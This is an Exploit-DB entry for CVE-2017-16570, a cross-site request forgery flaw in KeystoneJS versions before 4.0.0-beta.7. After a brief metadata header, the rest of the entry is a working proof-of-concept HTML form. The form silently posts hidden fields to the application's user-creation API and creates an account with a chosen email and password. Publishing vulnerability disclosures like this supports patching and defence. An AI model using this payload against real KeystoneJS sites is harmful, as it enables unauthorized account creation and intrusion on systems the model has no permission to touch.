KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery

2018-01-28T00:00:00
ID EDB-ID:43922
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-28T00:00:00

Description

KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery. CVE-2017-16570. Webapps exploit for NodeJS platform

                                        
                                            # Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570


Link: https://vuldb.com/?id.109170


Exploit:

&lt;html&gt;
 &lt;body&gt;
 &lt;form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data"&gt;
 &lt;input type="hidden" name="name&#46;first" value="Saurabh" /&gt;
 &lt;input type="hidden" name="name&#46;last" value="Banawar" /&gt;
 &lt;input type="hidden" name="email"
value="saurabh&#46;banawar&#64;securelayer7&#46;net" /&gt;
 &lt;input type="hidden" name="password" value="test" /&gt;
 &lt;input type="hidden" name="password&#95;confirm" value="test" /&gt;
 &lt;input type="submit" value="Submit request" /&gt;
 &lt;/form&gt;
 &lt;/body&gt;
&lt;/html&gt;